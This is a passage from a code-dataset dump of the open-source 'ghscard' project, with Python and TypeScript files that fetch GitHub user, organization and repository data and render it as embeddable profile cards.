emoji_parser():\n return EmojiParser(emojis)\n\n\nclass Test_Emoji_constructor:\n @pytest.mark.parametrize([\"value\", \"expected\"], [[None, ValueError]])\n def test_exception(self, emoji_parser, value, expected):\n with pytest.raises(expected):\n EmojiParser(value)\n\n\nclass Test_Emoji_parse:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [\n [\":+1:\", [\"+1\"]],\n 
[\"a:-1:b\", [\"-1\"]],\n [\"a:-1:b:accept:c\", [\"-1\", \"accept\"]],\n [\"\", []],\n [\":\", []],\n [\":+1\", []],\n ],\n )\n def test_normal(self, emoji_parser, value, expected):\n assert emoji_parser.parse(value) == expected\n\n @pytest.mark.parametrize([\"value\", \"expected\"], [[None, ValueError], [1, ValueError]])\n def test_exception(self, emoji_parser, value, expected):\n with pytest.raises(expected):\n emoji_parser.parse(value)\n\n\nclass Test_Emoji_get_url:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [\n [\n \"1st_place_medal\",\n \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f947.png?v7\",\n ],\n [\n \":1st_place_medal:\",\n \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f947.png?v7\",\n ],\n ],\n )\n def test_normal(self, emoji_parser, value, expected):\n assert emoji_parser.get_url(value) == expected\n\n @pytest.mark.parametrize([\"value\", \"expected\"], [[None, ValueError], [1, ValueError]])\n def test_exception(self, emoji_parser, value, expected):\n with pytest.raises(expected):\n emoji_parser.get_url(value)\n" }, { "alpha_fraction": 0.6658768057823181, "alphanum_fraction": 0.6658768057823181, "avg_line_length": 20.100000381469727, "blob_id": "2b6241be627d5bd94e7c585b1baf815ccd94f6fc", "content_id": "e5f58ddc54425216fc0b9c28933d558f055c5d09", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 422, "license_type": "permissive", "max_line_length": 93, "num_lines": 20, "path": "/ghscard/_stopwatch.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. 
codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport contextlib\nimport datetime\n\nfrom ._const import DATETIME_FORMAT\n\n\[email protected]\ndef stopwatch(logger, name):\n start_time = datetime.datetime.now()\n\n logger.debug(f\"start {name:s}: {start_time.strftime(DATETIME_FORMAT):s}\")\n\n try:\n yield\n finally:\n logger.debug(f\"complete {name:s}: time={datetime.datetime.now() - start_time} [sec]\")\n" }, { "alpha_fraction": 0.662665843963623, "alphanum_fraction": 0.6632975339889526, "avg_line_length": 37.60975646972656, "blob_id": "25c6a2eaf934cf5467ffb01c6b8e5e5bdb7c43d4", "content_id": "981e663140457f97750bd7df80008099af76f7ab", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1583, "license_type": "permissive", "max_line_length": 92, "num_lines": 41, "path": "/ghscard/fetcher/_organization.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\n\nfrom .._const import DATETIME_FORMAT, CardType, CommonCardKey\nfrom ._base import AbstractCardDataFetcher, CardData\n\n\nclass OrganizationCardDataFetcher(AbstractCardDataFetcher):\n @property\n def type(self) -> str:\n return CardType.ORGANIZATION\n\n def fetch(self) -> CardData:\n self._logger.debug(f\"fetching org data: id={self.id}\")\n\n card_data = super().fetch()\n org = self._pygh_client.get_organization(self.id)\n description = self.__get_description()\n\n card_data[CommonCardKey.AVATAR_URL] = org.avatar_url\n card_data[CommonCardKey.CARD_TYPE] = CardType.ORGANIZATION\n card_data[CommonCardKey.CREATED_AT] = org.created_at.strftime(DATETIME_FORMAT)\n card_data[CommonCardKey.DESCRIPTION] = description\n card_data[CommonCardKey.EMOJIS] = self._get_emoji_mapping(description)\n card_data[CommonCardKey.HTML_URL] = org.html_url\n card_data[CommonCardKey.NAME] = self.id\n card_data[CommonCardKey.UPDATED_AT] = 
org.updated_at.strftime(DATETIME_FORMAT)\n card_data[\"blog\"] = org.blog\n card_data[\"company\"] = org.company\n card_data[\"email\"] = org.email\n card_data[\"location\"] = org.location\n card_data[\"public_gists\"] = org.public_gists\n card_data[\"public_repos\"] = org.public_repos\n card_data[\"public_members_count\"] = sum([1 for _member in org.get_public_members()])\n\n return card_data\n\n def __get_description(self):\n return self._ghc_client.get(f\"/orgs/{self.id:s}\").get(\"description\")\n" }, { "alpha_fraction": 0.6427289247512817, "alphanum_fraction": 0.6427289247512817, "avg_line_length": 23.755556106567383, "blob_id": "e896e7688f10fdc3531877c1f3e551e2a97883b2", "content_id": "2b699fcca3bf9cd4e7dc213cdb08e43e957a0323", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1114, "license_type": "permissive", "max_line_length": 74, "num_lines": 45, "path": "/src/card/repository/medium.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { ChartSize } from \"../../const\";\nimport { UiSize } from \"../../types\";\nimport { AbstractRepositoryCardGerator } from \"./base_repository\";\n\nexport class MediumRepoCardGerator extends AbstractRepositoryCardGerator {\n protected get headerSize(): UiSize {\n return \"large\";\n }\n\n protected get infoSize(): UiSize {\n return \"medium\";\n }\n\n protected get popupSize(): UiSize {\n return \"medium\";\n }\n\n protected get versionLabelSize(): UiSize {\n return \"medium\";\n }\n\n protected get topicSize(): UiSize {\n return \"small\";\n }\n\n protected get lineChartHeight(): number {\n return ChartSize.Line.Medium.HEIGHT;\n }\n\n protected get pieChartHeight(): number {\n return ChartSize.Pie.Medium.HEIGHT;\n }\n\n protected get pieChartLegendFontSize(): number {\n return ChartSize.Pie.Medium.LEGEND_FONT_SIZE;\n }\n\n protected get chartTitleFontSize(): number {\n return ChartSize.Line.Medium.TITLE_FONT_SIZE;\n }\n\n 
protected get chartTickFontSize(): number {\n return ChartSize.Line.Medium.TICK_FONT_SIZE;\n }\n}\n" }, { "alpha_fraction": 0.5289430618286133, "alphanum_fraction": 0.5324584245681763, "avg_line_length": 34.55833435058594, "blob_id": "6215010d92ed39aeb56464b98b4e6e523f77d965", "content_id": "fc371ada4362af089b15f56dce4020721bb66268", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 4269, "license_type": "permissive", "max_line_length": 104, "num_lines": 120, "path": "/src/manager.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { CardGeratorInterface } from \"./card/interface\";\nimport { Margin } from \"./const\";\nimport { EmojiProcessorFactory } from \"./emoji\";\nimport { createCardGenerator } from \"./factory\";\nimport { CardStyle } from \"./types\";\n\nimport $ from \"jquery\";\n\nnamespace CardAttr {\n export namespace Display {\n export const CHART = \"chart-display\"; // only for repository\n export const TOPICS = \"topic-display\"; // only for repository\n }\n\n export const EMOJI = \"emoji\";\n export const FRAME_COLOR = \"color\";\n export const STYLE = \"card-style\";\n export const WIDTH = \"card-width\";\n}\n\nconst DEFAULT_CARD_WIDTH_MAPPING = {\n medium: 420,\n small: 380,\n tiny: 340,\n};\nconst DEFAULT_CARD_STYLE: CardStyle = \"medium\";\n\nexport class CardGeneratorManager {\n constructor(private _doc: Document) {}\n\n public generateCards(): void {\n console.debug(navigator.userAgent);\n let frameCount = 0;\n\n Array.prototype.forEach.call(this._doc.getElementsByClassName(\"ghscard\"), (cardElement) => {\n const dataSourcePath: string = cardElement.getAttribute(\"src\");\n let cardStyle: CardStyle;\n\n if (cardElement.getAttribute(CardAttr.STYLE) !== null) {\n cardStyle = cardElement.getAttribute(CardAttr.STYLE);\n } else {\n console.debug(`${CardAttr.STYLE} attribute not found`);\n cardStyle = DEFAULT_CARD_STYLE;\n }\n\n 
$.getJSON(dataSourcePath, (cardData) => {\n console.info(`--- creating a GitHub card from ${dataSourcePath} ---`);\n console.debug(cardData);\n\n const cardGenerator: CardGeratorInterface = createCardGenerator(\n this._doc,\n cardStyle,\n cardData,\n this.getIframeWidth(cardElement.getAttribute(CardAttr.WIDTH), cardStyle),\n cardElement.getAttribute(CardAttr.FRAME_COLOR),\n cardElement.getAttribute(CardAttr.Display.CHART),\n cardElement.getAttribute(CardAttr.Display.TOPICS),\n EmojiProcessorFactory.create(\n cardElement.getAttribute(CardAttr.EMOJI),\n cardData[\"emojis\"]\n )\n );\n\n if (cardGenerator == null) {\n console.error(`skip invalid card data: ${dataSourcePath}`);\n return;\n }\n\n const cardFrame = cardGenerator.createCard(frameCount);\n\n frameCount++;\n cardElement.parentNode.insertBefore(cardFrame, cardElement);\n $(cardFrame).on(\"load\", () => {\n const card = cardFrame.contentWindow.document.getElementsByTagName(\"div\")[0];\n\n if (card === undefined) {\n return;\n }\n\n // tslint:disable-next-line\n // cardFrame.height = `${card.getBoundingClientRect().height + Margin.FRAME * 2}px`;\n cardFrame.height = `${card.getBoundingClientRect().height + Margin.FRAME}px`;\n cardFrame.style.visibility = \"visible\";\n });\n }).fail((jqXHR, textStatus, errorThrown) => {\n console.error(\n [\n `failed to execute getJSON: ${textStatus}`,\n `path: ${dataSourcePath}`,\n `error: ${errorThrown}`,\n `response:${jqXHR.responseText}`,\n ].join(\"\\n\")\n );\n });\n });\n }\n\n private getIframeWidth(cardWidth: string, cardStyle: CardStyle): number {\n let iframeWidth: number;\n\n if (cardWidth === null) {\n iframeWidth = DEFAULT_CARD_WIDTH_MAPPING[cardStyle];\n } else {\n iframeWidth = Number(cardWidth);\n }\n\n return iframeWidth;\n }\n\n /*\n private appendCardCss(cardId: string): void {\n this._doc.head.appendChild(this.createCssElement(\n this._doc, `#${cardId} .ui.card {\n position: fixed;\n height:100%;\n }`));\n // overflow: hidden;\n }\n */\n}\n" }, { 
"alpha_fraction": 0.6151100397109985, "alphanum_fraction": 0.6180844902992249, "avg_line_length": 27.982759475708008, "blob_id": "3e21db94587f8a60001bd5063b0a096c09d85ac6", "content_id": "46becd6b9fd77b0484b8eeb820d0088c1383223e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1681, "license_type": "permissive", "max_line_length": 97, "num_lines": 58, "path": "/ghscard/_cache.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "from datetime import datetime\nfrom functools import total_ordering\nfrom typing import Union\n\nfrom datetimerange import DateTimeRange\nfrom path import Path\n\n\n@total_ordering\nclass CacheTime:\n @property\n def second(self) -> Union[int, float]:\n return self.__second\n\n @property\n def hour(self) -> float:\n return self.second / (60**2)\n\n def __init__(self, second: Union[int, float]):\n self.__second = second\n\n def __eq__(self, other) -> bool:\n return self.second == other.second\n\n def __lt__(self, other) -> bool:\n return self.second < other.second\n\n\nclass CacheManager:\n def __init__(self, logger, cache_lifetime: CacheTime) -> None:\n self.__logger = logger\n self.__cache_lifetime = cache_lifetime\n\n def is_cache_available(self, cache_file_path: Path) -> bool:\n if not cache_file_path.isfile():\n self.__logger.debug(f\"cache not found: {cache_file_path}\")\n return False\n\n try:\n dtr = DateTimeRange(datetime.fromtimestamp(cache_file_path.mtime), datetime.now())\n except OSError:\n return False\n\n if not dtr.is_valid_timerange():\n return False\n\n cache_elapsed = CacheTime(dtr.get_timedelta_second())\n cache_msg = \"path={path}, lifetime={lifetime:.1f}h, elapsed={elapsed:.1f}h\".format(\n path=cache_file_path, lifetime=self.__cache_lifetime.hour, elapsed=cache_elapsed.hour\n )\n\n if cache_elapsed < self.__cache_lifetime:\n self.__logger.debug(f\"cache available: {cache_msg}\")\n return True\n\n self.__logger.debug(f\"cache expired: 
{cache_msg}\")\n\n return False\n" }, { "alpha_fraction": 0.5757956504821777, "alphanum_fraction": 0.5770519375801086, "avg_line_length": 28.121952056884766, "blob_id": "060a92aeb0f2176833f210e6268f1b6ce7db5fe1", "content_id": "b3c0356d48e4ad0e0eeabae3338f46aebe90e1cf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2388, "license_type": "permissive", "max_line_length": 82, "num_lines": 82, "path": "/ghscard/_detector.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport github\nimport typepy\nfrom github.GithubException import UnknownObjectException\n\nfrom ._const import CardType\n\n\nclass GithubIdDetector:\n @property\n def id(self) -> str:\n return self.__id\n\n def __init__(self, id: str, logger, pygh_client: github.Github) -> None:\n try:\n self.__id = id.strip().strip(\"/\")\n except (TypeError, AttributeError) as e:\n raise ValueError(e)\n\n id_item_list = [id_item.strip() for id_item in self.__id.split(\"/\")]\n self.__id = \"/\".join(id_item_list)\n\n if typepy.is_null_string(self.__id):\n raise ValueError(\"id must not be an empty string\")\n\n logger.debug(f\"id: {id}\")\n\n self.__pygh_client = pygh_client\n self.__card_type = self.__get_card_type()\n\n def is_user(self) -> bool:\n return self.get_id_type() == CardType.USER\n\n def is_organization(self) -> bool:\n return self.get_id_type() == CardType.ORGANIZATION\n\n def is_repository(self) -> bool:\n return self.get_id_type() == CardType.REPOSITORY\n\n def get_id_type(self) -> str:\n return self.__card_type\n\n def __get_card_type(self) -> str:\n id_item_list = self.id.split(\"/\")\n\n if len(id_item_list) > 2:\n raise ValueError(\n \"invalid format for a GitHub id: \"\n \"expected='<user name>' or '<user name>/<repo name>', \"\n \"actual='{}'\".format(id)\n )\n\n if len(id_item_list) == 2:\n user_name, repo_name = id_item_list\n 
self.__validate_user_name(user_name)\n self.__validate_repo_name(repo_name)\n\n return CardType.REPOSITORY\n\n user_name = id_item_list[0]\n self.__validate_user_name(user_name)\n\n try:\n self.__pygh_client.get_organization(self.id)\n return CardType.ORGANIZATION\n except UnknownObjectException:\n pass\n\n return CardType.USER\n\n @staticmethod\n def __validate_user_name(user_name: str) -> None:\n if typepy.is_null_string(user_name):\n raise ValueError(\"user/organization name must not be an empty string\")\n\n @staticmethod\n def __validate_repo_name(repo_name: str) -> None:\n if typepy.is_null_string(repo_name):\n raise ValueError(\"repository name must not be an empty string\")\n" }, { "alpha_fraction": 0.5894150137901306, "alphanum_fraction": 0.5922005772590637, "avg_line_length": 32.24074172973633, "blob_id": "503fdc7ad4a15bcc6cb961b074af45c30baee16e", "content_id": "55b22b458d9c5720587e3f1e1a238778bad5f9b6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5385, "license_type": "permissive", "max_line_length": 100, "num_lines": 162, "path": "/ghscard/_generator.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. 
codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport errno\nimport os.path\nfrom typing import Mapping\n\nimport click\nimport github\nimport msgfy\nimport typepy\nfrom github.GithubException import BadCredentialsException, UnknownObjectException\nfrom path import Path\nfrom pathvalidate import sanitize_filename\n\nfrom ._cache import CacheManager, CacheTime\nfrom ._const import MAX_PER_PAGE, AppConfigKey\nfrom ._detector import GithubIdDetector\nfrom ._github_client import GitHubClient\nfrom ._stopwatch import stopwatch\nfrom .fetcher import (\n AbstractCardDataFetcher,\n OrganizationCardDataFetcher,\n RepositoryCardDataFetcher,\n UserCardDataFetcher,\n)\n\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json # type: ignore\n\n\nclass CardGenerator:\n def __init__(self, logger, app_config: Mapping[str, str], is_overwrite: bool) -> None:\n self.__logger = logger\n self.__access_token = app_config.get(AppConfigKey.GITHUB_API_ACCESS_TOKEN)\n self.__output_dir = Path(app_config.get(AppConfigKey.OUTPUT_DIR))\n self.__indent = app_config.get(AppConfigKey.INDENT)\n\n cache_time = CacheTime(24 * (60**2))\n if is_overwrite:\n cache_time = CacheTime(0)\n self.__cache_manager = CacheManager(logger, cache_time)\n\n if typepy.is_not_null_string(self.__access_token):\n logger.debug(\"access token found in the configuration file\")\n\n self.__pygh_client = github.Github(self.__access_token, per_page=MAX_PER_PAGE)\n\n def generate_card(self, github_id: str) -> int:\n self.__set_github_id(github_id)\n\n output_path = self.__output_dir.joinpath(\n \"{:s}.json\".format(sanitize_filename(github_id, \"_\"), null_value_handler=raise_error)\n )\n if self.__cache_manager.is_cache_available(output_path):\n self.__logger.notice(f\"skip: valid card data already exist: {output_path}\")\n return 0\n\n try:\n with stopwatch(self.__logger, f\"fetch {github_id} {self.__data_fetcher.type}\"):\n card_data = self.__data_fetcher.fetch()\n except OSError as e:\n 
self.__logger.error(msgfy.to_error_message(e))\n return errno.ECONNRESET\n except BadCredentialsException:\n self.__logger.error(\"invalid GitHub API public access token\")\n return errno.EBADRQC\n except KeyboardInterrupt:\n self.terminate()\n raise\n except UnknownObjectException as e:\n if e.status == 404:\n message = \"'{}' {}\".format(self.__data_fetcher.id, e.data.get(\"message\"))\n else:\n message = e.data.message # type: ignore\n self.__logger.error(\n \"{:s} failed to get GitHub data: type={}, id={}, status={}, \"\n \"message={}\".format(\n e.__class__.__name__,\n self.__data_fetcher.type,\n self.__data_fetcher.id,\n e.status,\n message,\n )\n )\n return errno.ENODATA\n\n card_data_text = json.dumps(card_data, indent=self.__indent, ensure_ascii=False)\n\n self.__logger.debug(f\"fetched card data: {card_data_text}\")\n\n try:\n self.__make_output_dir()\n except TypeError:\n click.echo(card_data_text)\n return 0\n except OSError as e:\n self.__logger.error(msgfy.to_error_message(e))\n\n return e.args[0]\n\n try:\n with open(output_path, \"w\", encoding=\"utf-8\") as f:\n f.write(card_data_text + \"\\n\")\n except OSError as e:\n self.__logger.error(msgfy.to_error_message(e))\n return e.args[0]\n\n self.__logger.info(\n f\"written {self.__detector.get_id_type().lower():s} data to '{output_path:s}'\"\n )\n\n return 0\n\n def terminate(self) -> None:\n self.__data_fetcher.terminate()\n\n def __get_data_fetcher_class(self):\n # pytype: disable=attribute-error\n\n if self.__detector.is_repository():\n return RepositoryCardDataFetcher\n\n if self.__detector.is_user():\n return UserCardDataFetcher\n\n if self.__detector.is_organization():\n return OrganizationCardDataFetcher\n\n raise ValueError(f\"unknown id type: {self.__detector.id}\")\n # pytype: enable=attribute-error\n\n def __set_github_id(self, github_id: str) -> None:\n self.__github_id = github_id\n self.__detector = GithubIdDetector(\n self.__github_id, self.__logger, pygh_client=self.__pygh_client\n 
)\n self.__data_fetcher = self.__create_data_fetcher()\n\n def __create_data_fetcher(self) -> AbstractCardDataFetcher:\n # pytype: disable=attribute-error\n return self.__get_data_fetcher_class()(\n pygh_client=self.__pygh_client,\n ghc_client=GitHubClient(\n logger=self.__logger, github_id=self.__detector.id, access_token=self.__access_token\n ),\n id=self.__detector.id,\n logger=self.__logger,\n )\n # pytype: enable=attribute-error\n\n def __make_output_dir(self) -> None:\n if os.path.isdir(self.__output_dir):\n return\n\n self.__logger.debug(f\"creating directory: {self.__output_dir}\")\n\n os.makedirs(self.__output_dir)\n" }, { "alpha_fraction": 0.2539682686328888, "alphanum_fraction": 0.2698412835597992, "avg_line_length": 33.3636360168457, "blob_id": "1e02422f96e7d1ed281e43e0e39ac0b27543c7b5", "content_id": "a73041a5f17b1c075d325b24a35afd9322bfdedc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 378, "license_type": "permissive", "max_line_length": 56, "num_lines": 11, "path": "/docs/pages/environment.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "Tested environment\n=======================\n\n.. 
table:: Tested Web Browsers\n\n ======================= ===========================\n Web browser Version\n ======================= ===========================\n ``Google Chrome`` ``57.0`` or newer\n ``Mozilla Firefox`` ``52.0`` or newer\n ======================= ===========================\n" }, { "alpha_fraction": 0.6678800582885742, "alphanum_fraction": 0.6693789958953857, "avg_line_length": 27.132530212402344, "blob_id": "d3bd799ac64fc7f83553344d6ccbadb75015abb5", "content_id": "5770862066c8ffa7d7f8ab44ba7927bd90053f7d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4670, "license_type": "permissive", "max_line_length": 97, "num_lines": 166, "path": "/ghscard/__main__.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport errno\nimport os\nimport sys\n\nimport appconfigpy\nimport click\nimport logbook\nimport logbook.more\nimport msgfy\nimport retryrequests\nimport typepy\nfrom appconfigpy import ConfigItem, ConfigManager, DefaultDisplayStyle\nfrom github.GithubException import RateLimitExceededException\n\nfrom .__version__ import __version__\nfrom ._const import PROGRAM_NAME, AppConfigKey\nfrom ._generator import CardGenerator\nfrom ._logger import get_logger\n\n\nQUIET_LOG_LEVEL = logbook.NOTSET\nCONTEXT_SETTINGS = dict(help_option_names=[\"-h\", \"--help\"], obj={})\nCONFIG_ITEMS = [\n ConfigItem(\n name=AppConfigKey.GITHUB_API_ACCESS_TOKEN,\n initial_value=None,\n prompt_text=\"GitHub API Personal Access Token\",\n default_display_style=DefaultDisplayStyle.PART_VISIBLE,\n ),\n ConfigItem(\n name=AppConfigKey.OUTPUT_DIR, prompt_text=\"Output Directory Path\", initial_value=\".\"\n ),\n ConfigItem(name=AppConfigKey.INDENT, prompt_text=\"Indent Size\", initial_value=4),\n]\n\nlogbook.more.ColorizedStderrHandler(\n level=logbook.DEBUG, format_string=\"[{record.level_name}] {record.channel}: 
{record.message}\"\n).push_application()\n\n\nclass Context:\n LOG_LEVEL = \"LOG_LEVEL\"\n\n\ndef get_api_status() -> str:\n r = retryrequests.get(\"https://kctbh9vrtdwd.statuspage.io/api/v2/status.json\")\n\n r.raise_for_status()\n\n return r.json()[\"status\"][\"indicator\"]\n\n\[email protected](context_settings=CONTEXT_SETTINGS)\[email protected]_option(version=__version__, message=\"%(prog)s %(version)s\")\[email protected](\"--debug\", \"log_level\", flag_value=logbook.DEBUG, help=\"for debug print.\")\[email protected](\n \"--quiet\", \"log_level\", flag_value=QUIET_LOG_LEVEL, help=\"suppress execution log messages.\"\n)\[email protected]_context\ndef cmd(ctx, log_level):\n ctx.obj[Context.LOG_LEVEL] = logbook.INFO if log_level is None else log_level\n\n\[email protected]()\[email protected]_context\ndef configure(ctx):\n \"\"\"\n Create a configuration file which includes GitHub API public access token.\n\n The value you provide for the GitHub API public access token written to\n the configuration file (~/.ghscard).\n\n Example:\n\n To create a new configuration:\n\n $ ghscard configure\n GitHub API Personal Access Token: <input access token>\n \"\"\"\n\n appconfigpy.set_log_level(ctx.obj[Context.LOG_LEVEL])\n\n app_config_mgr = ConfigManager(PROGRAM_NAME, CONFIG_ITEMS)\n\n sys.exit(app_config_mgr.configure())\n\n\[email protected]()\[email protected](\"github_id_list\", type=str, nargs=-1)\[email protected](\"--api-token\", default=None, help=\"GitHub API access token.\")\[email protected](\n \"-o\",\n \"--output-dir\",\n metavar=\"PATH\",\n default=None,\n help=\"Output path of the SQLite database file.\",\n)\[email protected](\n \"--overwrite\",\n \"is_overwrite\",\n is_flag=True,\n help=\"Overwrite card data even if data already exist and not expired.\",\n)\[email protected]_context\ndef gen(ctx, github_id_list, api_token, output_dir, is_overwrite):\n \"\"\"\n Generate a GitHub user/repository card data file.\n ID need to either '<user-name>' or 
'<user-name>/<repository-name>'.\n\n Example:\n\n $ ghscard gen thombashi/ghscard\n \"\"\"\n\n log_level = ctx.obj[Context.LOG_LEVEL]\n logger = get_logger(log_level, f\"{PROGRAM_NAME:s} gen\")\n appconfigpy.set_log_level(log_level)\n\n if get_api_status() == \"major\":\n logger.error(\"GitHub API status is in red status\")\n sys.exit(1)\n\n try:\n app_configs = ConfigManager(PROGRAM_NAME, CONFIG_ITEMS).load()\n except ValueError as e:\n logger.debug(msgfy.to_debug_message(e))\n app_configs = {}\n\n if typepy.is_not_null_string(output_dir):\n app_configs[AppConfigKey.OUTPUT_DIR] = output_dir\n\n if typepy.is_not_null_string(api_token):\n app_configs[AppConfigKey.GITHUB_API_ACCESS_TOKEN] = api_token\n elif os.environ.get(\"GITHUB_TOKEN\"):\n app_configs[AppConfigKey.GITHUB_API_ACCESS_TOKEN] = os.environ.get(\"GITHUB_TOKEN\")\n\n if not github_id_list:\n logger.error(\n \"command requires at least one argument: \"\n \"'<user-name>' or '<user-name>/<repository-name>'\"\n )\n sys.exit(errno.EINVAL)\n\n return_code_list = []\n generator = CardGenerator(logger, app_configs, is_overwrite)\n for gh_id in github_id_list:\n try:\n return_code_list.append(generator.generate_card(gh_id))\n except KeyboardInterrupt:\n sys.exit(errno.EINTR)\n except RateLimitExceededException as e:\n logger.error(e)\n sys.exit(errno.ENOSR)\n\n if any(return_code_list):\n sys.exit(1)\n\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n cmd()\n" }, { "alpha_fraction": 0.5529606938362122, "alphanum_fraction": 0.5530713796615601, "avg_line_length": 28.917219161987305, "blob_id": "060bc372e276fd2ed93e299962fbcf4463bc57cf", "content_id": "72333f4515ec38947b7b847bfe647c331121d619", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 9035, "license_type": "permissive", "max_line_length": 99, "num_lines": 302, "path": "/src/card/base_user_org.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { AVATAR_ELEMENT_ID 
} from \"../const\";\nimport { EmojiProcessorInterface } from \"../emoji\";\nimport { UiColor, UiSize, UserOrgCardDataKey } from \"../types\";\nimport { AbstractCardGerator } from \"./base\";\n\nexport class AbstractUserOrgCardGerator extends AbstractCardGerator {\n protected get avatarColumnWide(): string {\n throw Error(\"not implemented\");\n }\n\n protected get statsColumnWide(): string {\n throw Error(\"not implemented\");\n }\n\n protected get htmlUrl(): string {\n return this.getCardData(\"html_url\");\n }\n\n protected get publicRepos(): string {\n return this.getCardData(\"public_repos\");\n }\n\n constructor(\n doc: Document,\n cardData: object,\n iframeWidth: number,\n color: string,\n emojiProcessor: EmojiProcessorInterface\n ) {\n super(doc, cardData, iframeWidth, color, emojiProcessor);\n }\n\n protected createStatisticsElement(): HTMLElement {\n throw Error(\"not implemented\");\n }\n\n protected getCardData(key: UserOrgCardDataKey): string {\n return this._cardData[key];\n }\n\n protected getScript(): string {\n return [\n `$('#${AVATAR_ELEMENT_ID}.ui.image').popup({`,\n \" on: 'hover',\",\n \" inline: true\",\n \"});\",\n \"$('.ui.images .image').popup();\",\n ].join(\"\\n\");\n }\n\n protected getColor(): UiColor {\n return this.toUiColor(this.color);\n }\n\n protected createCardContent(): HTMLElement {\n return this._createCardContent();\n }\n\n protected _createCardContent(): HTMLElement {\n const segmentClassName = \"ui vertical basic compact segment\";\n const content = this.createContentElement([this.createCardHeader()]);\n\n {\n const grid = this.createElement(\"div\", \"ui grid\");\n\n {\n const avatarColumn = this.createElement(\n \"div\",\n `${this.avatarColumnWide} wide center aligned column`\n );\n avatarColumn.appendChild(this.createAvatar());\n avatarColumn.appendChild(this.createPopup());\n grid.appendChild(avatarColumn);\n }\n\n {\n const statsColumn = this.createElement(\n \"div\",\n `${this.statsColumnWide} wide left aligned 
column`\n );\n const statsElement = this.createStatisticsElement();\n\n if (statsElement) {\n statsColumn.appendChild(statsElement);\n }\n\n grid.appendChild(statsColumn);\n }\n\n content.appendChild(this.createElementWithChild(segmentClassName, [grid]));\n }\n\n {\n const descriptionElement = this.createDescription(this.getCardData(\"description\"));\n if (descriptionElement) {\n content.appendChild(\n this.createElementWithChild(segmentClassName, [descriptionElement])\n );\n }\n }\n\n {\n const userInfoList = this.createUserInfoList();\n if (userInfoList) {\n content.appendChild(this.createElementWithChild(segmentClassName, [userInfoList]));\n }\n }\n\n return content;\n }\n\n protected _createCardContentTiny(): HTMLElement {\n const segmentStyle = \"ui vertical basic compact segment\";\n const content = this.createContentElement([this.createCardHeader()]);\n\n {\n const grid = this.createElement(\"div\", \"ui grid\");\n\n {\n const avatarColumn = this.createElement(\n \"div\",\n `${this.avatarColumnWide} wide center aligned column`\n );\n avatarColumn.appendChild(this.createAvatar());\n avatarColumn.appendChild(this.createPopup());\n grid.appendChild(avatarColumn);\n }\n\n {\n const userInfoColumn = this.createElement(\"div\", \"nine wide left aligned column\");\n userInfoColumn.appendChild(this.createUserInfoList());\n grid.appendChild(userInfoColumn);\n }\n\n const segment = this.createElement(\"div\", segmentStyle);\n segment.appendChild(grid);\n\n content.appendChild(segment);\n }\n\n {\n const bioElement = this.createDescription(this.getCardData(\"description\"));\n if (bioElement) {\n const segment = this.createElement(\"div\", segmentStyle);\n segment.appendChild(bioElement);\n\n content.appendChild(segment);\n }\n }\n\n return content;\n }\n\n protected createExtraCardContent(): HTMLElement {\n return null;\n }\n\n protected createAvatar(): HTMLElement {\n const avatar = this.createImageElement(\n this.getCardData(\"avatar_url\"),\n \"ui medium rounded 
image\"\n );\n avatar.id = AVATAR_ELEMENT_ID;\n\n return avatar;\n }\n\n protected createPopupInfoList(): HTMLElement {\n return this._createInfoList(\n {\n created_at: true,\n updated_at: true,\n },\n this.popupSize\n );\n }\n\n protected createCompanyElement(className: string): HTMLElement {\n const companyName = this.getCardData(\"company\");\n\n if (!companyName) {\n return null;\n }\n\n const company = this.createElement(\"div\", className);\n company.title = \"Company\";\n company.appendChild(this.createElement(\"i\", \"users icon\"));\n company.appendChild(\n this.createContentElement([this._doc.createTextNode(this.escapeHtml(companyName))])\n );\n\n return company;\n }\n\n protected createLocationElement(className: string): HTMLElement {\n const locationName = this.getCardData(\"location\");\n\n if (!locationName) {\n return null;\n }\n\n const location = this.createElement(\"div\", className);\n location.title = \"Location\";\n location.appendChild(this.createElement(\"i\", \"marker icon\"));\n location.appendChild(\n this.createContentElement([this._doc.createTextNode(this.escapeHtml(locationName))])\n );\n\n return location;\n }\n\n protected createBlogElement(className: string): 